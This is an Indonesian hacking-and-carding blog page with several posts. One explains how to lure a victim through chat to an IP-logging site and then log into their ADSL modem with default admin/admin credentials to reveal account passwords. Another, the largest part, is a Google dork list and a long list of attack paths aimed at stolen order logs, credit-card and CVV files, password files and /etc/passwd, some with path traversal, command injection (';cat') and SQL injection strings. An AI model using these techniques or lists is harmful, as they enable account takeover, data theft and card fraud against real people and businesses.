Friendster,Hacking,Cracking,Carding

Friendster,Hacking,Cracking,Carding

Masukan Nama Penyanyi - Judul Lagu

Mesin Cari Free Download Mp3 Gratis
Masukan Nama Penyanyi - Judul Lagu

Mesin Cari Free Download Mp3 Gratis

Hacking Modem Speedy dan Penanganannya

Written by ferry89 on 01.25

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :




Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )




Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.




Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :




Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U




Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,
Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.







Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite




Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

Selengkapnya.....

Plagiarism will be detected by Copyscape

Written by ferry89 on 01.16

mungkin Anda sering merasa ingin mengetahui sumber dari situs yg memberikan informasi kepada anda....

tinggal klik 2 kali.....Dan ikuti prosedurnya.....

Page copy protected against web site content infringement by Copyscape

Selengkapnya.....

Melewati Proteksi Klik Kanan

Written by ferry89 on 01.10

Sedikit teori buat loe, program akan mengecek setiap kali kita mengklik tombol kanan pada mouse dan mencegahnya menampilkan menu yang umum. Sekarang, perhatikan tombol-tombol dalam sebuah mouse yang umum digunakan biasanya mempunyai 3 tombol yaitu :

1. Tombol sebelah kiri yang umum digunakan
2. Tombol kanan yang umumnya digunakan untuk menampilkan menu-menu tambahan
3. Tombol ditengah yang umumnya digunakan untuk scroll atau fungsi lain tergantung aplikasi
Nah loe kan dah belajar mengenal fungsi tombol mouse sekarang loe buka situs-situs yang memproteksi klik kanan!! Loe coba klik tombol kanan!! Nah mereka memproteksi , untuk melewatinya sebagai contohnya klik tombol kiri, tahan, klik tombol kanan, tahan, lepaskan tombol kiri, lepaskan tombol kanan. Contoh lain, klik tombol tengah, tahan, klik tombol kanan, tahan, lepaskan tombol tengah, lepaskan tombol kanan. Apa yang terjadi ? ternyata menu untuk menampilkan source code muncul dan pencegahan oleh program yang mencegah klik kanan tidak berlaku lagi!! Mudah banget kan?

Selengkapnya.....

Favorite Keyword Hackers di Google

Written by ferry89 on 01.05

Gue akan memberikan beberapa favorite keyword hacker di google cuman sedikit sih tapi kalo ada yg mau nambahi silahkan ditulis di kotak komentar!! Silahkan dilihat beberapa yg bisa gue berikan berikut ini

************************************

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurlasswd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

/robots.txt
/admin.mdb
/shopping.mdb
/arg;
/stats/styles.css
/statshelp.htm
/favicon.ico
/stats/admin.mdb
/shopdbtest.asp
/cgi-bin/test.cgi
/cgi-bin/test.pl
/cgi-bin/env.cgi
/photos/protest/styles.css
http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
/cgi-bin/whereami.cgi
/shopping400.mdb
/cgi/test.cgi
/cgi-bin/test2.pl
/photos/protest/kingmarch_02.html
/chevy/index.htm
/cgi-bin/glocation.cgi
/cgi-bin/test2.cgi
/ccbill/glocation.cgi
/cgi-bin/styles.css
/shopping350.mdb
/cgi-bin/shopper.cgi
/shopadmin.asp
/news_2003-02-27.htm
/cgi-bin/whois.cgi
3 /cgi-bin/calendar.pl
3 /cgi-bin/calendar/calendar.pl
3 /cgibin/styles.css
3 /venem.htm
2 /stats/www.newbauersflowers.com/stats/04-refers.htm
2 /cgi-bin/where.pl
2 /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
2 /cgibin/recon.cgi
2 /cgibin/test.cgi
2 /WebShop/templates/styles.css
2 /stats/shopping350.mdb
2 /cgi-bin/mailform.cgi
2 /cgi-bin/recon.cgi
2 /chevy
2 /cgi-bin/servinfo.cgi
2 /acart2_0.mdb
2 /cgi-bin/where.cgi
2 /chevy/
2 /stats/www.savethemall.net/stats/19-refers.htm
2 /ccbill/secure/ccbill.log
2 /cgi/recon.cgi
2 /stats/www.gregoryflynn.com/chevy
2 /ibill/glocation.cgi
2 /ccbill/whereami.cgi
2 /ibill/whereami.cgi
2 /apps_trial.htm
2 /cgi-bin/lancelot/recon.cgi
2 /cgi-bin/DCShop/Orders/styles.css
1 /cgi-bin/htmanage.cgi
1 /stats/www.tysons.net/stats/05-refers.htm
1 /cgi-bin/mastergate/add.cgi
1 /cgi-bin/openjournal.cgi
1 /cgi-bin/calendar/calendar_admin.pl
1 /cgibin/ibill/count.cgi
1 /cgi-bin/nbmember2.cgi
1 /cgi-bin/mastergate/count.cgi
1 /cgi-bin/mastergate/accountcreate.cgi
1 /cgi-bin/ibill/accountcreate.cgi
1 /cgibin/MasterGate2/count.cgi
1 /cgi-bin/amadmin.pl
1 /cgibin/mailform.cgi
1 /cgibin/mastergate/count.cgi
1 /cgibin/harvestor.cgi
1 /cgibin/igate/count.cgi
1 /WebShop
1 /shopdisplaycategories.asp
1 /cgi-bin/DCShop/Orders/orders.txt
1 /cgi-bill/revshare/joinpage.cgi
1 /stats/www.gregoryflynn.com/stats/19-refers.htm
1 /cgi-local/DCShop/auth_data/styles.css
1 /cgi-bin/add-passwd.cgi
1 /cgi-bin/MasterGate/count.cgi
1 /apps_shop.htm%20/comersus/database/comersus.mdb
1 /data/verotellog.txt
1 /epwd/ws_ftp.log
1 /stats/www.dialacure.com/stats/16-refers.htm
1 /cgi/MasterGate2/count.cgi
1 /jump/rsn.tmus/skybox;sz=140x150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019
1 /wwii/styles.css
1 /cgi-bin/admin.mdb
1 /stats/www.gregoryflynn.com/stats/31-refers.htm
1 /cgi-bin/ibill-tools/count.cgi
1 /WebShop/templates/cc.txt
1 /cgibin/ibill/accountcreate.cgi
1 /cgi-bin/count.cgi
1 /cgi-local/DCShop/auth_data/auth_user_file.txt
1 /cgi/mastergate/count.cgi
1 /cgi-bin/EuroDebit/addusr.pl
1 /cgi-bin/dbm-passwd.cgi
1 /cgi/igate/accountcreate.cgi
1 /cgi-bin/store/Log_files/your_order.log
store/log_files/your_order.log
/cg i-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log
/scripts/cart32.exe
/ cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt
/cgi-local/cart.pl
/PDG_Cart/order.log
/config/---.mdb
/cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.loghtml
/or ders/orders.txt
/cgis/cart.pl
/webcart/carts
/cgi-bin/cart32.exe/cart32clientlist
/cgi/cart.pl
/comersus/database/comersus.mdb
/WebShop/temp lates/cc.txt
/Admin_files/order.log
/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
/htbin/cart.pl
/productcart/database/EIPC.mdb
/shoponline/fpdb/shop.mdb
/config/datasources/myorder.mdb
/PDG_Cart/shopper.conf
/shopping/database/metacart.mdb
/bin/cart.pl
/cgi-bin/cart32.ini
/database/comersus.mdb
/cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt
/cgi-bin/store/Admin_files/myorderlog.txt
/cgi-bin/orders.txt
/cgi-bin/store/Admin_files/your_order.log
/test/test.txt
/fpdb/shop.mdb
/cgibin/shop/orders/orders.txt
/shopadmin1.asp
/cgi-bin/shop.cgi
/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
/cgi-bin/PDG_cart/card.txt
/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/store/shopdbtest.asp
/log_files/yo ur_order.log
/_database/expire.mdb
/HyperStat/stat_what.log
/cgi bin/DCShop/auth_data/auth_user_file.txt
/htbin/orders/orders.txt
/SHOP/shopadmin.asp
/index.cgi?page=../admin/files/order.log
/vpshop/shopadmin.asp
/webcart/config
/PDG/order.txt
/cgi-bin/shopper.cgi
/orders/order.log
/orders/db/zzzbizorders.log.html
/easylog/easylog.html
/cgi-bin/store/Log_files/your_order.log
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping400.mdb
/comersus_message.asp?
/orders/import.txt
/htbin/DCShop/auth_data/auth_user_file.txt
/admin /html_lib.pl
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.txt
/cgi-bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /shop.pl/page=;cat%20shop.pl
/cgi-bin/shopper?search=action&keywords=dhenzuser%20&template=order.log
/HBill/htpasswd
/bin/shop/auth_data/auth_user_file.txt
/cgi-bin /cs/shopdbtest.asp
/mysql/shopping.mdb
/Catalog/config/datasources/Products.mdb
/trafficlog
/cgi/orders/orders.txt
/cgi-local/PDG_Cart/shopper.conf
/store/cgi-bin/---.mdb
/derbyteccgi/shopper.cgi?key=SC7021&preadd=action&template=order.log
/derbyteccgi/shopper.cgi?search=action&keywords=moron&template=order.log
/cgi-bin/mc.txt
/cgi-bin/mall2000.cgi
/cgi-win /DCShop/auth_data/auth_user_file.txt
/cgi-bin/shopper.cgi?search=action&keywords=root%20&template=order.log
/store/commerce.cgi
/scripts/ shop/orders/orders.txt
/product/shopping350.mdb
/super_stats/access_logs
/cgi-local/orders/orders.txt
/ cgi-bin/PDG_Cart/mc.txt
/cgibin/cart32.exe
/cgi-bin/Shopper.exe?search=action&keywords=psiber%20&template=other/risinglogorder.log
/cgibin/password.txt
/Catalog/cart/carttrial.dat
/catalog/Admin /Admin.asp
/ecommerce/admin/user/admin.asp
/data/productcart/database/EIPC.mdb
/store/admin_files/commerce_user_lib.pl
/cgi-bin/store/index.cgi
/paynet.txt
/config/datasources/store/billing.mdb
/_database/shopping350.mdb
/cgi-bin/shopper.exe?search
/cgi/shop.pl/page=;cat%20shop.pl
/cgi-bin /store/Admin_files/orders.txt
/cgi-bin/store/commerce_user_lib.pl
/cgi-sys/pagelog.cgi
/cgi-sys/shop.pl/ page=;cat%20shop.pl
/scripts/weblog
/fpdb/shopping400.mdb
/htbin/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=myorder.log
/cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
/mall_log_files/
/cgi-bin/perlshop.cgi
/tienda/shopdbtest.asp
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
/cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
/WebShop/logs/ck.log
/fpdb/shopping300.mdb
/mysql/store.mdb
/cgi-bin/store/Admin_files/commerce_user_lib.pl
/config.dat
/order/order.log
/commerce_user_lib.pl
/Admin_files/AuthorizeNet_user_lib.pl
/cvv2.asp
/cgi-bin/cart32/CART32-order.txt
/wwwlog
/cool-logs/mlog.html
/cgi-bin /pass/merchant.cgi.log
/cgi-local/pagelog.cgi
/cgi-bin/pagelog.cgi
/cgi-bin/orders/cc.txt
/cgis/shop/orders/orders.txt
/admin /admin_conf.pl
/cgi-bin/pdg_cart/order.log
/cgi/PDG_Cart/order.log
/Admin_files/ccelog.txt
/cgi-bin/orders/mc.txt
/cgi/cart32.exe
/ecommerce/admin /admin.asp
/scripts/DCShop/auth_data/auth_user_file.txt
/Catalog/config/---.mdb
/ecommerce/admin/shopdbtest.asp
/mysql/mystore.mdb
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
/cgi-bin/Count.cgi?df=callcard.dat
/logfiles/
/shopping/shopping350.mdb
/admin/configuration.pl
/cgis/DCShop/auth_data/auth_user_file.txt
/cgis/cart32.exe
/ cgi-bin/dcshop.cgi
/cgi-win/shop/auth_data/auth_user_file.txt
/shopping400.mdb
/HBill/config
/cgi-bin/shop/index.cgi?page=../admin/files/order.log
/search=action&keywords=GSD%20&template=order.log
/WebCart/orders.txt
/PDG_Cart/ authorizenets.txt
/cgi-bin/AnyForm2
/~gcw/cgi-bin/Count.cgi?df=callcard.dat
/cgi-bin/PDG_Cart/order.log
/expire.mdb
/logger/
/webcart-lite/orders/im port.txt
/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
/cgi-bin/PDG_Cart/shopper.conf
/cgi-bin/cart32.exe
/dc/orders/orders.txt
/cgi-local/DCShop/orders/orders. txt
/shop.pl/page=shop.cfg
/cgi-local/cart32.exe
/cgi-win/pagelog.cgi
/cgi-win /shop/orders/orders.txt
/cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
/cgi-sys/DCShop/auth_data/auth_user_file.txt
/ cgi-bin/www-sql;;;
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order.log
/scripts/orders/orders.txt
/cgi-loca l/shop.pl/shop.cfg
/search=action&keywords=cwtb%20&template=expire.mdb
/php/mylog.phtml
/config/datasources/shopping.mdb
/php-coolfile/action.php?action=edit&file=config.php
/cgi-bin/ezmall2000/mall2000.cgi
/cgi/DCShop/orders/orders.txt
/cgi-local/ shop.pl
/cgis/DCShop/orders/orders.txt
/product/shopdbtest.asp
/ ASP/cart/database/metacart.mdb
/cgi-bin/cgi-lib.pl
/cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=1&html
/search=action&keywords=cwtb%20&template=order.log
/mysql/expire.mdb
/scripts/sh op/auth_data/auth_user_file.txt
/cgi-bin/cart32/whatever-OUTPUT.txt
/Shopping%20Cart/shopdbtest.asp
/cgi/shop/auth_data/auth_user_file.txt
/sh op/shopping350.mdb
/cgi-bin/store/Authorize_Net.pl
/scripts/DCShop/orders/orders.txt
/store/l og_files/commerce_user_lib.pl
/shopping/shopadmin.asp
/cgi-bin/orderlog.txt
/cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&CO DE=PHOLD;;;
/cool-logs/mylog.html
/cgibin/shop.pl/page=;cat%20shop.pl
/htbin /shop.pl/page=;cat%20shop.pl
/cgi-win/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.txt
/SHOP/shopdbtest.asp
/cgi/pagelog.c gi
/php/mlog.phtml
/cgi-bin/shop/apdproducts.mdb
/htbin/shop/auth_data/auth_user_file.txt
/server%20logfile;;;
/database/ metacart.mdb
/cgi-local/shop/orders/orders.txt
/dcshop/auth_data/auth_user_file.txt
/log/
/cgi-bin/shop.cgi/page=../../../../etc/hosts
/scripts/c32web.exe
/cgis/ord ers/orders.txt
/logfile/
/shop_db/shopping.mdb
/shopping.mdb
/weblog/
/config/datasources/cvv2.mdb
/cgi-bin/loadpage.cgi?user_id=id&file=data/db.txtcgi-bin /PDG_Cart/order.log
/cgi-sys/shop/orders/orders.txt
/cgi-bin/%20shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgi-win/cart32.exe
/cgi-bin/loadpage.cgi
/dcshop/orders/orders.txt
/shop/show.php?q='
/cgib in/orders/orders.txt
/bin/pagelog.cgi
/cgi-bin/shop/orders/orders.txt
/_database/shopdbtest.asp
/cgibin /pagelog.cgi
/cgi-local/shop.pl/page=;cat%20shop.pl
/shop/search .php?q='
/cgi-sys/cart32.exe
/order13.txt
/weblogs/
/orderb/sh op.mdb
/config/datasources/order.mdb
/store/cgi-bin/Admin_files/Store_user_lib.pl
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt;CC
/Orders /order.log
/logs/access_log
/config/datasources/your_order.mdb
/ecommerce/admin/admin/admin.asp
/mall_log_files/order.log
/bin/cart32.exe
/htbin/DCShop/orders/orders.txt
/Admin_files/Authorize_Net.pl
/logging/
/database/
/cgi-sys/shop/auth_data/auth_user_file.txt
/bin/shop.pl/page=;cat%20shop.pl
/cgi-local/shop/auth_data/auth_user_fil e.txt
/cgi-local/DCShop/auth_data/auth_user_file.txt
/cgi-bin/shop/auth_data/auth_user_file.txt
/cgi-win /DCShop/orders/orders.txt
/store/Admin_files/Authorize_Net.pl
/cart/cart.asp
/bin/DCShop/orders/orders.txt
/scripts/pagelog.cgi
/cgi-bin /%20shopper.cgi?preadd=action&key=PROFA&template=expire.mdb
/webcart/config/clients.txt
/dc/auth_data/auth_user_file.txt
/cgi-bin/shopper.exe?preadd=action&key=9461&template=order.log
/cgi-bin/shopper/cheddar/loadpage.cgi?user_id=id&file=data/db.txt
/bin /orders/orders.txt
/cgi-bin/Web_Store/web_store.cgi
/cgis/pagelog.cgi
/cgi-bin /orders/orders.txt
/merchant/shopdbtest.asp
/cgi-local/shop.pl/page=shop.cfg
/cgis/shop.pl/pa ge=;cat%20shop.pl
/index.cgi?%20pagine%20=%20../../../../../../../../etc/passwd
/cg-bin/
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin /DCShop/Auth_data/auth_user_file.txt
/ecommerce/admin/adminLeft/admin.asp
/webcart/orders/import.txt
/cgibin/shop/auth_data/auth_user_file.txt
/productcart/database/eipc.mdb
/mysql/cheersoundchdb.mdb
/cgi-bin/order.txt
/scripts/iisadmin/tools/mkilog.exe
/ProductCart/database/EIPC.mdb
/databases/
/cg i-sys/orders/orders.txt
/cgi/DCShop/auth_data/auth_user_file.txt
/ database/EIPC.mdb
//cgi-bin/orders.txt
/vpasp-shopcart/shopdbtest.asp
/cgi-bin /shopper.exe?preadd=action&key=bajk390ss&template=order.log
/cgi-bin/DCShop/orders/orders.txt
/mysql/shopping350.mdb
/_database/shopping.mdb
/htbin/cart32.exe
/PDG_Cart/shopper.config
/cgis/shop/auth_data/auth_user_file.txt
/shop/SHOPDBTEST.ASP
/bin/shop/orders/orders.txt
//cgi-local/medstore/loadpage.cgi?user_id=id &file=data/orders.txt
/cgi-bin/store/dcshop_admin.cgi
/_database/shopping400.mdb
/scripts/shop.pl/page=;cat%20shop.pl
/cgibin/PDG_Cart/shopper.conf
/cgibin/DCShop/orders/orders.txt
/cgibin/%20awstats.pl?output=keywords
/cgi/shop/orders/orders.txt
/cgi-bin /cart32_old.exe
/webshop/templates/cc.txt
/webcart/orders
/pro ductcart/database/shop.mdb
/index.php?link=order
/cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
/shopping/shopdisplayproducts.asp?
/ccbill-local.cgi
/bin/DCShop/auth_data/auth_user_file.txt
/cgi-bin /c32web.exe/CheckError?error=53
/server/admin_files/commerce_user_lib.pl
/shopping/shopdisplayproducts.asp?id=1&cat=order.log
/mail.cgi
/cgibin/admin_files/
/cgi-bin/mail/form.cgi
/cgibin/shopping/database/metacart.mdb
/globill/ver12otellog.txt
/cgi-bin/shopping.mdb
/shopping%20.mdb
/cgi-bin/mail.cgi
/cgi-bin/FORM.cgi
/cgibin/shop/database/metacart.mdb
/mail/form.cgi
/cgibin /shop/shopping350.mdb
/form.cgi
/shopping/cgi-bin/cart32.ini
/index.cgi?page=../../../../../../../../etc/passwd
/cgi-bin/c32web.exe/ShowProgress
/vpasp/shopdisplayproducts.asp?cat=qwerty'% 20union%20select%20fldauto
/cgibin/orders.txt
/cgibin/scripts/shop/shopping350.mdb
/form/mail.cgi
/cgi-bin/store1b/index.cgi?page=../../../../../../../../etc/passwd
/webshop/logs/cc.txt
/form/form.cgi
/store/index.cgi?page=../../../../../../../../etc/passwd
/cgibin/awstats.pl%3Flang%3Dit%26output%3Durldetail
/cgibin/%20awstats.pl?
/cgi-bin/Form.cgi
/vpasp/shopdisplayproducts.asp?cat=admin'%20and%20fldpassword%0li%20ke%20'a%25
/admin.mdb
/cgi-bin/cart32.exe/error
/cgi/mail.cgi
/cgi-bin/c32web.exe/ShowAdminDir
/cgi-bin/csql/index.cgi?page=../admin/files/order.log
/cgi-bin/admin_files/
/cgi-bin/csql/index.cgi?page=../../../../../../../../etc/passwd
/admins.asp
/cgi-bin/cart_top
/cgi-bin/mail/mail.cgi
/shopadmin.asp
/cgi-bin/order.log
/mailform.pl
/cgibin/admin.pl
/vpasp/shopdisplayproducts.asp?
/policies1.htm
/cgi-bin/c32web_old.exe
/cgi-bin /c32web.exe
/cgi-bin/form/form.cgi
/cgibin/metacart.mdb
/shopdisplayproducts.asp
/cgi-sys/DCShop/orders/orde rs.txt
/ccbill6/secure/
/MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=3124 &STRMVER=4&CAPREQ=0
/cgi-bin/ibill.log
/ccbill6/
/password.txt
/cgi-bin /PDG_cart/card
/cgibin/www.google.com
/honeymoonhideaway.htm+honeymoon+charleston
/cgibin/awstats.pl%3Flang%3Dnl
/cgibin/admin.pl?setpasswd
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D09
/cgibin/%20awstats.pl?output=keywords
/shop/shopping450.mdb
/ccbill6/secure/ccbill.log
/cgibin/awstats.pl%3Flang%3Des%26update%3D1
/cgibin/shopper.cgi?search=action&keywords=ccpower%20&template=shopper.conf
/cgi-bin/form.cgi
/M83A
/cgibin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/amadmin.pl?setpasswd
/cgi-bin/awstats.pl%3Flang%3Dit
/orderdb/database/eipc.mdb
/cg-bin//eshop/database/order.mdb
/store/database/comersus.mdb
/cgibin /password.mdb
/~admin/guestbook
/cgibin/%20awstats.pl?%20cgibin/%20awstats.pl?output=keywords
/cgibin /awstats.pl%3Foutput%3Durldetail%26lang%3Dnl
/cgibin/%20awstats.pl?output=keywords
/sumthin
/cgibin/cgibin/%20awstats.pl?output=keywords
/cgi-bin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/productcart/database/eipc.mdb
/cgibin/awstats.pl%3Flang%3Den%26output%3Durldetail
/cgibin/awstats.pl%3Foutput%3Dkeyphrases%26lang%3Dit
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dde
/mail/mail.cgi
/cgibin/shopper.cgi?search=action&keywords=ccpower&template=shopper.conf
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dnl
/cg/.%20/comersus/database/comersus.mdb
/index%20of%20/%20productcart/database/eipc.mdb
/scripts/nsiislog.dll
/cgibin/order.cgi
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=2614&STRMVER=4&CAPREQ=0
/cgi-bin /awstats.pl%3Flang%3Dde
/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=3124&STRMVER=4&CAPREQ=0
/cgibinserver/admin_files/commerce_user_lib.pl
/cgibin/store/Admin_files/myorderlog.txt
//cgibin/orders.txt
/cgibin/database/shopping.mdb
/cgibin/shopping/shopadmin.asp
/cgi-bin/shopper.cgi?preadd=action&key=PROFA&template=order1.log
/cgibin/shopper.exe?search=action&keywords=psiber&template=order.log
/cgibin/allmanageup.pl
/cgi-win/shop.pl/page=;cat%20shop.pl
/eshop/database/log.mdb
/cgibin /awsta
/cgibin/nph-proxy.pl
/cgibin/awstats.pl%3Flang%3Dnl%26update%3D1
//config/---.mdb
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Den
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Des
/cgibin/ccbill/password/.htpasswd
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D08
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeyphrases
/eshop/en/database/credit.mdb
/cgi-bin /pdg_cart/shopper.conf
/password.mdb
/data/verotellog.txt
/cgibin/awstats.pl%3Foutput%3Durldetail%26update%3D1
/productcart/eipc.mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D11
/cgibin/awstats.pl%3Foutput%3Durldetail%26lang%3Dit
/index%20of%20/webshop/templates/cc.txt
/cartdb/database/eipc.mdb
/cg i-bin/eshop/database/order.mdb
/cgibin//fpdb/shopping400.mdb
/cgibin/order.txt
/cgi-bin/cart32.exe/expdate%20algunas%20veces
/cgibin/awstats.pl%3Flang%3Dde%26output%3Dkeywords
/cgibin/database/comersus.mdb
/cgi-bin/awstats.pl%3Flang%3Des
/cgibin/awstats.pl%3Foutput%3Dkeywords%26lang%3Dfr
/globill/
/cgibin/fpdb/shopping400.mdb
/cgibin/perl.exe
/eshop/en/database/log.mdb
/cgibin/shopper.exe?search=action&keywords=psiber&template=orders.log
/cg/comersus/database/comersus. mdb
/cgi-bin/awstats.pl%3Fyear%3D2003%26month%3D07
/cgibin/awstats.pl%3Flang%3Dnl%26output%3Durldetail
